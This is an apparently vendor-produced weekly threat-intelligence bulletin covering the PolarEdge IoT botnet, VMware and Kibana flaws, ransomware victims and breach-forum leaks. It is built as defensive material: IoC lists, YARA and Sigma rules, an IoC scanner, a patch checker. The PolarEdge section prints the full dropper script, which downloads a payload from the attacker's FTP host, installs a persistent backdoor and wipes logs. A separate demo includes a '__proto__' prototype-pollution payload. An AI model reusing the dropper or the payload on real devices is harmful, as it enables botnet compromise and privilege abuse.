Introduction
The Weekly Cybersecurity Bulletin is prepared by the ECHO Threat Intelligence team to summarize and inform about cybersecurity incidents from the past week.
Executive Summary
This bulletin provides up-to-date information on cyber threats such as attacks, data breaches, malware, ransomware, and critical security vulnerabilities. Our security team analyzes these threats and prepares the weekly bulletin to help readers minimize the resulting risks.
Featured Malware of the Week: PolarEdge IoT Botnet
PolarEdge is a new type of botnet targeting IoT devices.
It compromises routers with inadequate security measures, NAS devices (QNAP), IP cameras, and other smart home devices to establish a persistent network.
The compromised devices, referred to as “zombies” (botnet nodes), are remotely controlled by attackers and used for DDoS attacks, cryptomining, or data theft.
Impact of the Malware
Massive DDoS Attacks: PolarEdge can create a vast source of DDoS attacks using hijacked devices.
Data Risks on QNAP and NAS Devices: Malicious payloads can access and exfiltrate backup files or critical data.
Distributed Architecture: The botnet operates thousands of devices across different regions, giving attackers access to a powerful “zombie network”.
Technical Steps of the Malware
Targets edge and IoT devices from vendors such as Cisco, QNAP, Asus, and Synology.
Exploits known vulnerabilities, such as CVE-2023-20118, a command injection flaw in the web management interface of Cisco Small Business RV-series routers, to gain unauthorized access.
The attacker deploys a web shell on the Cisco devices to integrate them into the botnet.
PolarEdge executes payloads built specifically for IoT device architectures such as MIPS64.
Since the last quarter of 2023, the PolarEdge botnet has been actively exploiting vulnerabilities in Asus, Cisco, QNAP, and Synology devices.
PolarEdge spreads primarily by abusing weaknesses in IoT devices, such as default credentials or unpatched firmware. Where manufacturer updates are not applied or network access to the management interface is not restricted, attackers infiltrate these devices and enrol them in the botnet.
For example, after triggering CVE-2023-20118 on a Cisco Small Business router, the attacker implants a web shell, which provides remote command-and-control over the device.
Malware Code & Functions
PolarEdge operators upload a shell script named `q` and a binary named `cipher_log` to the device over FTP or HTTP. The payloads are built for the MIPS64 architecture, and the `q` script exits unless `uname -m` reports `mips64`.
The `q` script is the primary infection stage: it fetches the payload archive, installs `cipher_log`, sets up persistence and cleans up after itself. Variants and payloads tailored to NAS devices such as QNAP have also been observed. The script:
#!/bin/sh
# Cleanup: remove web server logs, delete the script itself and any stale lock
rm -f /tmp/httpd.log /tmp/web.log
rm -f $0
rm -f /tmp/.lock
# Only run on MIPS64 devices; the payload is built for that architecture
ARCH=$(uname -m)
if [ "$ARCH" != "mips64" ]; then
    exit 1
fi
# Take the lock and kill competing or monitoring processes
touch /tmp/.lock
killall -9 ca config.exp process_monitor application
# Download the payload archive over FTP with hard-coded credentials (polar / 123456);
# retry once after 15 seconds if the archive looks truncated
ftpget -v -u polar -p 123456 119.8.186.227 /tmp/t.tar t.tar
SIZE=$(ls -l /tmp/t.tar | awk '{print $5}')
if [ "$SIZE" -lt 10000 ]; then
    sleep 15
    ftpget -v -u polar -p 123456 119.8.186.227 /tmp/t.tar t.tar
fi
tar xvf /tmp/t.tar -C /tmp/
cp /tmp/cipher_log /etc/flash/etc/
# Persistence: a watchdog loop restarts the backdoor every 10 seconds and is
# appended to two device-specific files under /tmp/splitDB/
cat <<EOF > /etc/flash/etc/cipher.sh
while true; do
/etc/flash/etc/cipher_log
sleep 10
done
EOF
chmod +x /etc/flash/etc/cipher.sh
echo "/etc/flash/etc/cipher.sh &" >> /tmp/splitDB/BONJOUR
echo "/etc/flash/etc/cipher.sh &" >> /tmp/splitDB/SYSTEM
# Execution and cleanup: start the backdoor, stop the device web server,
# then remove the lock and the staged copy of the binary
/tmp/cipher_log &
killall httpd
rm -f /tmp/.lock
rm -f /tmp/cipher_log
Communication Mechanism of the Malware
TLS Backdoor: The device establishes an encrypted channel with the attacker over TLS.
Commands the Attacker Can Send:
Retrieve DDoS attack parameters.
Download and execute new malicious modules.
Report device information (model, network configuration, etc.).
Network and Firewall Manipulation:
Ports such as 443 (HTTPS/TLS) or 22 (SSH) may be opened for attack traffic.
Indicators of Compromise (IoCs)
IP Addresses (C2, Payload Hosting, etc.)
– 119.8.186[.]227 – FTP server hosting the malicious “t.tar” archive
– 185.28.100[.]XX – Additional IPs scanned by PolarEdge during attacks
File Names
– /tmp/q – Primary infection script
– /tmp/t.tar – Downloaded tar archive
– cipher_log – Malicious binary (TLS backdoor), staged in /tmp and copied to /etc/flash/etc/
– /etc/flash/etc/cipher.sh – Persistence watchdog script
– /tmp/.lock – Lock file used to prevent concurrent executions
Webshell – sha256
– 1ca7262f91d517853a0551b14abb0306c4e3567e41b1e82a018f0aac718e499e
PolarEdge botnet – sha256
– eda7cc5e1781c681afe99bf513fcaf5ae86afbf1d84dfd23aa563b1a043cbba8
– 13cd040a7f488e937b1b234d71a0126b7bc74367bf6538b6961c476f5d620d13
– 464f29d5f496b4acffc455330f00adb34ab920c66ca1908eee262339d6946bcd
– 932b2545bd6e3ad74b82ca2199944edecf9c92ad3f75fce0d07e04ab084824d5
– 121969d72f8e6f09ad93cf17500c479c452e230e27e7b157d5c9336dff15b6ef
PolarEdge botnet – Delivery infrastructure
– 119.8.186[.]227
– longlog[.]cc
– landim[.]cc
– hitchil[.]cc
– Logchim[.]cc
– ssofhoseuegsgrfnu[.]ru
PolarEdge botnet – Reporting infrastructure
– aipricadd[.]top
– firebasesafer[.]top
– largeroofs[.]top
– siotherlentsearsitech[.]shop
– asustordownload[.]com
– gardensc[.]cc
– headached[.]cc
– durianlink[.]cc
– nternetd[.]cc
– suiteiol[.]cc
– centrequ[.]cc
– icecreand[.]cc
– 159.138.119[.]99
– 43.129.205[.]244
– 122.8.183[.]181
– 195.123.212[.]54
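As an added example, not part of the ECHO bulletin or of any vendor tooling, the Node.js script below refangs the IoCs listed above and scans log lines for them. The matchers are anchored so that a listed IP or domain does not fire on a longer address or hostname that merely contains it, while subdomains of a listed domain still match. The log lines are constructed for the example and their field layout is an assumption.

```javascript
// Added example: refang the defanged PolarEdge IoCs listed above and scan log lines for them.
// Not code from the ECHO bulletin or any vendor; the log lines below are constructed for
// the example and their field layout is an assumption.

const IOCS = {
  ipv4: [
    "119.8.186[.]227", "159.138.119[.]99", "43.129.205[.]244",
    "122.8.183[.]181", "195.123.212[.]54",
  ],
  domain: [
    "longlog[.]cc", "landim[.]cc", "hitchil[.]cc", "Logchim[.]cc", "ssofhoseuegsgrfnu[.]ru",
    "aipricadd[.]top", "firebasesafer[.]top", "largeroofs[.]top", "siotherlentsearsitech[.]shop",
    "asustordownload[.]com", "gardensc[.]cc", "headached[.]cc", "durianlink[.]cc",
    "nternetd[.]cc", "suiteiol[.]cc", "centrequ[.]cc", "icecreand[.]cc",
  ],
  path: ["/tmp/t.tar", "/tmp/cipher_log", "/etc/flash/etc/cipher_log", "/etc/flash/etc/cipher.sh"],
  command: ["ftpget -v -u polar"],
};

// Undo the defanging used in the IoC list ("[.]" for ".", "hxxp" for "http") and normalise case.
function refang(ioc) {
  return ioc.replace(/\[\.\]/g, ".").replace(/^hxxp/i, "http").toLowerCase();
}

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// One anchored matcher per IoC: 119.8.186.227 must not match 119.8.186.2270 and
// longlog.cc must not match notlonglog.cc; update.longlog.cc (a subdomain) still matches.
function buildMatchers(iocs) {
  const matchers = [];
  for (const [type, list] of Object.entries(iocs)) {
    for (const raw of list) {
      const value = refang(raw);
      const literal = escapeRegExp(value);
      let re;
      if (type === "ipv4") re = new RegExp(`(?<![\\d.])${literal}(?![\\d.])`);
      else if (type === "domain") re = new RegExp(`(?<![a-z0-9-])${literal}(?![a-z0-9-])`, "i");
      else re = new RegExp(literal);
      matchers.push({ type, value, re });
    }
  }
  return matchers;
}

// Return one hit per (line, IoC) pair; line numbers are 1-based.
function scanLines(lines, matchers = buildMatchers(IOCS)) {
  const hits = [];
  lines.forEach((line, idx) => {
    for (const m of matchers) {
      if (m.re.test(line)) hits.push({ line: idx + 1, type: m.type, ioc: m.value });
    }
  });
  return hits;
}

// Constructed sample telemetry (not real logs): DNS, firewall, shell trace and cron lines.
const SAMPLE_LOGS = [
  "Mar 06 10:12:01 edge-rtr dnsmasq[412]: query[A] update.longlog.cc from 192.168.1.23",
  "Mar 06 10:12:02 fw01 kernel: [FW] ACCEPT IN=lan OUT=wan SRC=192.168.1.23 DST=119.8.186.227 PROTO=TCP DPT=21",
  "Mar 06 10:12:09 edge-rtr sh[519]: + ftpget -v -u polar -p 123456 119.8.186.227 /tmp/t.tar t.tar",
  "Mar 06 10:13:00 edge-rtr dnsmasq[412]: query[A] cdn.notlonglog.cc from 192.168.1.40",
  "Mar 06 10:13:30 nas01 cron[77]: (root) CMD (/etc/flash/etc/cipher.sh &)",
];

if (typeof require !== "undefined" && require.main === module) {
  console.table(scanLines(SAMPLE_LOGS));
}
```

Against the five sample lines the scanner reports six hits: the subdomain lookup on line 1, the FTP connection on line 2, the IP, archive path and `ftpget` credential string on line 3, and the persistence script on line 5; the near-miss hostname on line 4 does not fire. Feed it the output of `grep` over your DNS, firewall and shell audit logs, or replace `SAMPLE_LOGS` with `fs.readFileSync(...).split("\n")`.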
**Yara Rule**
rule PolarEdge_Botnet
{
    meta:
        description = "Detects the PolarEdge IoT botnet infection script and its artifacts"
        author = "ECHO"
        date = "2025-03-06"
        hash = "eda7cc5e1781c681afe99bf513fcaf5ae86afbf1d84dfd23aa563b1a043cbba8"
        severity = "high"
    strings:
        $file_q = "/tmp/q"
        $file_cipher_log = "/tmp/cipher_log"
        $lock_file = "/tmp/.lock"
        $payload_tar = "/tmp/t.tar"
        $malicious_ip = "119.8.186.227"
        $malicious_domain = "longlog.cc"
        $cmd1 = "ftpget -v -u polar"
        $cmd2 = "tar xvf"
        $cmd3 = "killall"
        $cmd4 = "rm -f"
        $cmd5 = "/etc/flash/etc/cipher_log"
        $cmd6 = "/etc/flash/etc/cipher.sh"
    condition:
        filesize < 2MB and
        (
            // Infrastructure indicators and the hard-coded FTP user are specific enough on their own
            $malicious_ip or $malicious_domain or $cmd1 or
            // Otherwise require a PolarEdge-specific install path plus a second script artifact.
            // Generic strings such as "rm -f", "killall" or "/tmp/.lock" never fire alone:
            // the original condition OR-ed them in individually and matched almost any shell script.
            (($cmd5 or $cmd6) and ($payload_tar or $file_cipher_log or $cmd2)) or
            ($file_q and $payload_tar and $lock_file and $cmd3 and $cmd4)
        )
}
**Sigma Rule**
title: Detect PolarEdge IoT Botnet Activity
id: 7d0c2a9e-5b41-4c6f-8e3a-1f2b9c4d6e80   # placeholder UUID assigned here; Sigma requires a valid UUID and the original "1234abcd-..." value was not one
status: experimental
description: Detects PolarEdge IoT botnet activity on Linux-based edge devices - creation of the dropper and payload paths, the ftpget download with the hard-coded FTP user, and connections to the delivery and reporting infrastructure.
author: ECHO
date: 2025-03-06
tags:
    - attack.command_and_control
    - attack.t1071
    - attack.t1105
    - attack.t1059.004
logsource:
    product: linux   # the selections span file, process and network events; map the field names to your backend
detection:
    selection_file:   # exact paths written by the q script; /tmp/.lock is omitted because it is too generic to match alone
        TargetFilename:
            - '/tmp/q'
            - '/tmp/t.tar'
            - '/tmp/cipher_log'
            - '/etc/flash/etc/cipher_log'
            - '/etc/flash/etc/cipher.sh'
    selection_cmd:    # the download command with the hard-coded credentials
        CommandLine|contains|all:
            - 'ftpget'
            - '-u polar'
    selection_net:    # delivery and reporting IPs
        DestinationIp:
            - '119.8.186.227'
            - '159.138.119.99'
            - '43.129.205.244'
            - '122.8.183.181'
            - '195.123.212.54'
    selection_dns:    # delivery and reporting domains
        DestinationHostname|endswith:
            - 'longlog.cc'
            - 'landim.cc'
            - 'hitchil.cc'
            - 'logchim.cc'
            - 'ssofhoseuegsgrfnu.ru'
            - 'aipricadd.top'
            - 'firebasesafer.top'
            - 'largeroofs.top'
            - 'siotherlentsearsitech.shop'
            - 'asustordownload.com'
            - 'gardensc.cc'
            - 'headached.cc'
            - 'durianlink.cc'
            - 'nternetd.cc'
            - 'suiteiol.cc'
            - 'centrequ.cc'
            - 'icecreand.cc'
    condition: 1 of selection_*
fields:
    - TargetFilename
    - CommandLine
    - DestinationIp
    - DestinationHostname
falsepositives:
    - Unlikely
level: high
Malware Details and MITRE ATT&CK
| Technique Code | Technique Name |
|---|---|
| T1071 | Application Layer Protocol (C2 traffic over HTTP/HTTPS/TLS) |
| T1133 | External Remote Services (Telnet/SSH exploitation) |
| T1496 | Resource Hijacking (use of compromised devices for DDoS and mining) |
| T1059.004 | Command and Scripting Interpreter: Unix Shell (the `q` dropper is a /bin/sh script) |
| T1105 | Ingress Tool Transfer (payload download via ftpget) |
| T1070.004 | Indicator Removal: File Deletion (self-deletion, log and staging cleanup) |
| T1005 | Data from Local System (data theft from the device) |
Highlighted Vulnerabilities of the Week
Security Updates Released for Actively Exploited VMware Product Vulnerabilities
VMware has released security updates for ESXi, Workstation, and Fusion products that address actively exploited critical vulnerabilities.
These vulnerabilities allow attackers to execute code and leak sensitive information.
Vulnerability Details
CVE-2025-22224: TOCTOU Heap Overflow in VMCI
Vulnerability Type: Code execution (guest to host)
CVSS Score: 9.3
Details: A time-of-check time-of-use race in the VMCI component leads to an out-of-bounds write. An attacker with local administrative privileges inside a guest virtual machine can use it to execute code as that VM’s VMX process on the host.
CVE-2025-22225: Arbitrary Write Vulnerability
Vulnerability Type: Sandbox escape
CVSS Score: 8.2
Details: An attacker who already has code execution inside the VMX process can trigger an arbitrary kernel write and escape the VMX sandbox onto the host.
CVE-2025-22226: Out-of-Bounds Read in HGFS
Vulnerability Type: Information disclosure
CVSS Score: 7.1
Details: An out-of-bounds read in the HGFS (host-guest file sharing) component lets an attacker with administrative privileges in a guest leak memory from the VMX process.
Affected Products and Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| VMware ESXi 8.0 | Builds before the fixed build | ESXi80U3d-24585383 |
| VMware ESXi 7.0 | Builds before the fixed build | ESXi70U3s-24585291 |
| VMware Workstation 17.x | 17.x before 17.6.3 | 17.6.3 |
| VMware Fusion 13.x | 13.x before 13.6.3 | 13.6.3 |
| VMware Cloud Foundation 5.x and 4.x | Bundled ESXi | Apply ESXi80U3d-24585383 / ESXi70U3s-24585291 |
| VMware Telco Cloud Platform and Infrastructure | Bundled ESXi | Relevant ESXi patches have been released |
Technical Details
None of the three issues is remotely exploitable by an unauthenticated attacker: each requires a foothold inside a guest VM (administrator rights in the guest for CVE-2025-22224 and CVE-2025-22226, code execution within the VMX process for CVE-2025-22225). Taken together they form a VM escape chain: CVE-2025-22224 turns guest admin into code execution in the VMX process on the host, CVE-2025-22225 escapes the VMX sandbox to the host kernel, and CVE-2025-22226 leaks VMX memory that helps defeat mitigations. Any tenant or workload owner with administrative access to a VM is therefore in scope, which is why the patches should be treated as urgent on multi-tenant and shared hosts.
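As an added example, not from the ECHO bulletin or from Broadcom, the Node.js snippet below turns the fixed-version table above into a check that can run over an inventory. It parses the first line of `vmware -vl` (format assumed to be `VMware ESXi 8.0.3 build-24022510`) and compares the build number against the fixed builds on this page; Workstation and Fusion installs are compared by dotted version. Only the builds printed here are encoded, so an ESXi 8.0 Update 2 host patched with its own fixed build would be reported as vulnerable by this check; verify such hosts against the vendor advisory. The inventory entries are constructed.

```javascript
// Added example (not from the ECHO bulletin or Broadcom): decide whether an ESXi host or a
// Workstation/Fusion install is below the fixed versions listed in the table above.
// Only the builds printed on this page are encoded; an 8.0 Update 2 host carrying its own
// fixed build is reported "vulnerable" here, so check the vendor advisory for other lines.

const FIXED_ESXI_BUILDS = { "8.0": 24585383, "7.0": 24585291 }; // ESXi80U3d / ESXi70U3s
const FIXED_DESKTOP_VERSIONS = { Workstation: "17.6.3", Fusion: "13.6.3" };

// Parse the first line of `vmware -vl`, e.g. "VMware ESXi 8.0.3 build-24022510" (format assumed).
function parseVmwareVl(output) {
  const m = /VMware ESXi (\d+)\.(\d+)(?:\.(\d+))? build-(\d+)/.exec(output);
  if (!m) return null;
  return { line: `${m[1]}.${m[2]}`, version: `${m[1]}.${m[2]}.${m[3] || "0"}`, build: Number(m[4]) };
}

function esxiStatus(output) {
  const info = parseVmwareVl(output);
  if (!info) return { status: "unknown", reason: "unrecognised vmware -vl output" };
  const fixedBuild = FIXED_ESXI_BUILDS[info.line];
  if (fixedBuild === undefined) return { ...info, status: "unknown", reason: "release line not in the table" };
  return { ...info, fixedBuild, status: info.build >= fixedBuild ? "patched" : "vulnerable" };
}

// Numeric dotted-version compare returning -1, 0 or 1, so "17.6.10" sorts after "17.6.3".
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

function desktopStatus(product, version) {
  const fixed = FIXED_DESKTOP_VERSIONS[product];
  if (!fixed) return { product, version, status: "unknown", reason: "product not in the table" };
  if (version.split(".")[0] !== fixed.split(".")[0]) {
    return { product, version, status: "unknown", reason: "major version not covered by this advisory" };
  }
  return { product, version, fixed, status: compareVersions(version, fixed) >= 0 ? "patched" : "vulnerable" };
}

// Run over an inventory where each entry carries the captured `vmware -vl` text.
function auditEsxiInventory(inventory) {
  return inventory.map(({ host, vl }) => ({ host, ...esxiStatus(vl) }));
}

// Constructed inventory for the example; host names and builds are not real systems.
const SAMPLE_INVENTORY = [
  { host: "esx-01", vl: "VMware ESXi 8.0.3 build-24022510\nVMware ESXi 8.0 Update 3" },
  { host: "esx-02", vl: "VMware ESXi 8.0.3 build-24585383\nVMware ESXi 8.0 Update 3" },
  { host: "esx-03", vl: "VMware ESXi 7.0.3 build-21930508\nVMware ESXi 7.0 Update 3" },
  { host: "esx-04", vl: "VMware ESXi 6.7.0 build-17700523\nVMware ESXi 6.7 Update 3" },
];

if (typeof require !== "undefined" && require.main === module) {
  console.table(auditEsxiInventory(SAMPLE_INVENTORY));
  console.table([desktopStatus("Workstation", "17.6.2"), desktopStatus("Fusion", "13.6.3")]);
}
```

The comparison is on the build number rather than the version string because ESXi patch releases within one update line share the same version (8.0.3 here) and differ only in build. Collect `vmware -vl` over SSH or from vCenter and feed the text into `auditEsxiInventory`.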
Kibana Critical Vulnerability: Risk of Executing Arbitrary Code
A critical vulnerability in Kibana, Elastic’s data visualization front end, allows authenticated attackers to execute arbitrary code on the Kibana host.
Tracked as CVE-2025-25012 and rated 9.9 on the CVSS v3.1 scale, it stems from a prototype pollution issue.
Vulnerability Details
The flaw is reachable through a crafted file upload and specially crafted HTTP requests. By injecting keys such as `__proto__` into objects that Kibana merges, an attacker modifies shared JavaScript object prototypes, bypasses security controls that read from those prototypes, and ultimately achieves arbitrary code execution on the system.
Attack Vector and MITRE ATT&CK:
– CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (‘Prototype Pollution’)
– T1059: Command and Scripting Interpreter
Affected Versions
Kibana Versions and Exploitable User Roles:
| Version | Exploitable Roles |
|---|---|
| 8.15.0 – 8.17.0 | Users with the Viewer role |
| 8.17.1 – 8.17.2 | Users with fleet-all, integrations-all, and actions:execute-advanced-connectors privileges |
Kibana 8.17.3 fixes the issue. Where upgrading is not immediately possible, Elastic’s advisory recommends disabling the affected feature by setting `xpack.integration_assistant.enabled: false` in kibana.yml.
Exploitation requires only a valid account with one of the roles above; no advanced tooling or reverse engineering is needed.
Technical Details
The two affected code paths are Kibana’s file upload handler and its HTTP request processing. In both, attacker-controlled object keys reach a merge operation, which lets the attacker:
– Modify JavaScript object prototypes shared by every object in the process
– Bypass security controls whose checks read inherited properties
– Execute arbitrary code on the system
The weakness is classified as CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes, ‘Prototype Pollution’) and is associated with T1059 (Command and Scripting Interpreter) in the MITRE ATT&CK framework.
| Technique Code | Technique Name |
|---|---|
| T1071 | Application Layer Protocol (C2 traffic over HTTP/HTTPS) |
| T1059 | Command and Scripting Interpreter (command execution via scripting) |
| T1070.004 | Indicator Removal: File Deletion (malicious file deletion) |
| T1105 | Ingress Tool Transfer (file transfer) |
| T1021.002 | Remote Services: SMB/Windows Admin Shares (file transfer over a remote connection) |
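To make the CWE-1321 mechanism concrete, here is an added Node.js example that is not Kibana’s code and does not reproduce the CVE-2025-25012 exploit: a deliberately minimal recursive merge of the kind found in many JavaScript applications, alongside a hardened version. The request body and the authorisation check are constructed for the example; the point it demonstrates is that a single `__proto__` key in untrusted JSON changes the behaviour of unrelated objects anywhere in the process.

```javascript
// Added example, not Kibana's code: the CWE-1321 pattern behind CVE-2025-25012 shown on a
// deliberately minimal recursive merge, alongside a hardened version. The request body and
// the authorisation check are constructed for the example.

const isPlainObject = (v) => v !== null && typeof v === "object" && !Array.isArray(v);

// Vulnerable: trusts every key in the source. When the source carries an own property literally
// named "__proto__", target["__proto__"] resolves to Object.prototype and the recursion writes into it.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: drop the keys that reach the prototype chain, and only recurse into the target's
// own plain objects, never into inherited ones.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed hostile body. JSON.parse creates an *own* enumerable property named "__proto__"
// (it does not set the prototype), which is exactly what the merge loop then iterates over.
const HOSTILE_BODY = '{"theme":"dark","__proto__":{"isAdmin":true}}';

// A check that reads a property without confirming it is the object's own: inherited values pass.
function isAuthorized(user) {
  return user.isAdmin === true;
}

// Merge the body into a per-user settings object with the given merge function and report what
// leaked to an unrelated object. Object.prototype is restored afterwards so the process stays usable.
function demo(merge) {
  const settings = {};
  merge(settings, JSON.parse(HOSTILE_BODY));
  const guest = { name: "guest" }; // never given isAdmin anywhere
  const result = {
    settingsTheme: settings.theme,
    guestIsAdmin: isAuthorized(guest),
    prototypePolluted: "isAdmin" in {},
  };
  delete Object.prototype.isAdmin;
  return result;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafeMerge:", demo(unsafeMerge)); // guestIsAdmin: true
  console.log("safeMerge:  ", demo(safeMerge));   // guestIsAdmin: false
}
```

With `unsafeMerge` the guest object, which was never touched, passes `isAuthorized`; with `safeMerge` the same body is accepted (the `theme` still lands) but the `__proto__` key is discarded and nothing leaks. Defence in depth on top of the merge fix: start Node with `--disable-proto=delete`, freeze `Object.prototype` at startup, and keep configuration in `Object.create(null)` objects so there is no prototype to reach. None of those replaces the merge fix, since `constructor.prototype` is a second route to the same place.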
Ransomware Attacks Targeting Companies
Quigley Eye Specialists
Group Name: Cactus
Victim: quigleyeye.com
Industry: Healthcare / Ophthalmology
Impact: Leakage of employee and patient personally identifiable information, internal company documents, and medical records.
Quigley Eye Specialists is a Florida-based medical and surgical clinic specializing in the diagnosis and treatment of vision disorders.
Leaked Data Types:
– Personally identifiable information
– Medical records
– Database backups
– Internal company documents
– Financial records
– Confidential corporate and personal communications
Yara Rule
rule CactusRansomware {
    meta:
        description = "rule to detect Cactus Ransomware"
        author = "ECHO"
        date = "2024-01-18"
        Rule_Version = "v1"
        malware_type = "ransomware"
        malware_family = "Cactus"
        License = "MIT License, https://opensource.org/license/mit/"
        Hash = "9ec6d3bc07743d96b723174379620dd56c167c58a1e04dbfb7a392319647441a,c49b4faa6ac7b5c207410ed1e86d0f21c00f47a78c531a0a736266c436cc1c0a"
    strings:
        $strReadMe = "cAcTuS.readme.txt" wide
        $strLockExt = ".cts" wide
        $strTskName = "Updates Check Task" wide
        $strTskName2 = "Google Service Update"
        $strNTUSer = "ntuser.dat" wide
        $strNTUSer2 = "ntuser.log" wide
        $strBuilderName = "cactusbuilder"
    condition:
        // The PE check must apply to both branches: "and" binds tighter than "or", so the
        // original "... or ($strBuilderName)" matched any file containing "cactusbuilder",
        // including text documents such as this bulletin.
        uint16(0) == 0x5A4D and
        (
            ($strReadMe and $strLockExt and (1 of ($strTskName*)) and (1 of ($strNTUSer*))) or
            $strBuilderName
        )
}
Forstenlechner Installationstechnik
Group Name: Akira
Victim: forstenlechner.com
Industry: Construction Technology / Mechanical Engineering
Impact: Leakage of over 41GB of critical corporate data, including employee and customer information.
Forstenlechner is a company founded by the Perger family, specializing in construction technology and mechanical engineering.
Leaked Data Types:
– Employee and customer contact information (phone numbers, email addresses)
– HR documents
– Social security numbers (SVNr)
– Financial data (audit reports, payment details)
– Confidential licenses
– Agreements and contracts
– Internal company documents
Yara Rule
/*
Akira ransomware
*/
rule Akira
{
meta:
author = "ECHO"
family = "Akira"
description = "Akira ransomware Windows payload"
severity = 10
score = 100
strings:
$s0 = "\x00--encryption_path\x00" ascii wide
$s1 = "\x00--share_file\x00" ascii wide
$s2 = "\x00--encryption_percent\x00" ascii wide
$s3 = "\x00-fork\x00" ascii
$s4 = "\x00-localonly\x00" ascii wide
$s5 = "\x00Failed to read share files\x00" ascii wide
$s6 = ":\\akira\\asio\\include\\" ascii
$s7 = "\x00write_encrypt_info error: \x00" ascii
$s8 = "\x00encrypt_part error: \x00" ascii
$s9 = "\x00Detected number of cpus = \x00" ascii
$s10 = "\x00No path to encrypt\x00" ascii
$s11 = "Paste this link - https://akira" ascii
$s12 = "\x00Trend Micro\x00" wide
$s13 = "Failed to make full encrypt" ascii wide
$s14 = "Failed to make spot encrypt" ascii wide
$s15 = "Failed to make part encrypt" ascii wide
$s16 = "Failed to write header" ascii wide
$s17 = "file rename failed. System error:" ascii wide
$s18 = "Number of thread to folder parsers = \x00" ascii
$s19 = "Number of threads to encrypt = \x00" ascii
$s20 = "Number of thread to root folder parsers = \x00" ascii
$s21 = "Failed to read share files!\x00" ascii
$h0 = { 41 BA 05 00 00 00 41 80 FB 32 44 0F 42 D0 33 D2 48 8B C?
49 F7 F2 4C 8B C8
( B? 02 00 00 00 [0-4] 41 B? 04 00 00 00 |
41 B? 04 00 00 00 [0-4] B? 02 00 00 00 )
41 80 FB 32 44 0F 42 C? 41 8B C8 4? 0F AF C? 48 2B F9 33 D2
48 8B C7 49 F7 F2 }
$h1 = { C7 45 ?? 03 00 00 00 80 7D ?? 31 76 07 C7 45 ?? 05 00 00 00
0F B6 45 ?? 48 0F AF 45 ?? 48 C1 E8 02
48 B? C3 F5 28 5C 8F C2 F5 28 48 F7 E? 48 89 ?? 48 C1 E8 02 }
condition:
(((uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)) or
(uint32(0) == 0x464C457F)) and
(
(7 of ($s*)) or
(1 of ($h*))
)
}
Ray Fogg Corporate Properties
Group Name: Akira
Victim: rayfogg.com
Industry: Real Estate / Commercial Property Management
Impact: Leakage of over 75 GB of critical corporate data
Ray Fogg Corporate Properties is a commercial real estate firm with a diverse portfolio of flexible office spaces, warehouses, and industrial properties available for lease.
Leaked Data Types:
– Financial data (audits, payment details, financial reports)
– Confidential licenses, agreements, and contracts
– Employee and customer contact information (phone numbers, email addresses)
– Internal company documents
Yara Rule
The Akira rule given above under Forstenlechner Installationstechnik applies to this incident unchanged.
What’s Happening in the Hacker Forum World?
Aryaduta.com Hotels 2025 BIG BREACH HOT – Database, Leaked!
Date: March 5, 2025
Threat Actor: JumboJet
Forum: BreachForums
Post:
In March 2025, Aryaduta Hotels, a hospitality sector platform, suffered a massive data breach. This breach exposed sensitive information related to both customers and hotel management. The leaked database contains over 2.29 million records spanning 169 tables.
Breach Details:
– Over 2.29 million records
– 169 different tables
– Customer information
– Hotel management data
– Reservation details
– Payment history and billing information
The leaked database is in SQL format and has a size of 686.4 MB.
GasMobi – Leaked, Download!
Date: March 5, 2025
Threat Actor: Blinkers
Forum: BreachForums
Post:
In March 2025, GasMobi (gasmobi.com), a mobile marketing and affiliate platform, suffered a major data breach. This leak exposed sensitive data belonging to both customers and business partners.
Breach Details:
– 18,000 user records
– Email, Skype, and Telegram information
– Phone numbers and company details
– Passwords and token information
– Payment history and authentication documents
– Address and country details
The compressed leaked data is 368 MB, while the uncompressed version is 1.17 GB.
GasMobi’s management has not yet made an official statement regarding the breach.
THE AMERICAN ACADEMY OF DRAMATIC ARTS 300K USER, hacked by CyberJund
Date: March 6, 2025
Threat Actor: CyberJund
Forum: BreachForums
Post:
In March 2025, a major data breach targeted The American Academy of Dramatic Arts (AADA) (aada.edu). CyberJund, the threat actor behind the attack, announced the leak of 300,000 – 400,000 user records belonging to the academy.
Breach Details:
– Personal data of 5,000 famous actors
– Full name, gender, date of birth
– Email, phone number, and address
– City, state, postal code, and country details
– Interests and agent information
Access to the full leaked dataset is behind a paid access mechanism on the forum. The academy’s management has not yet issued a statement.
Want a demo for your company? Contact us here: https://echocti.com/schedule-a-demo/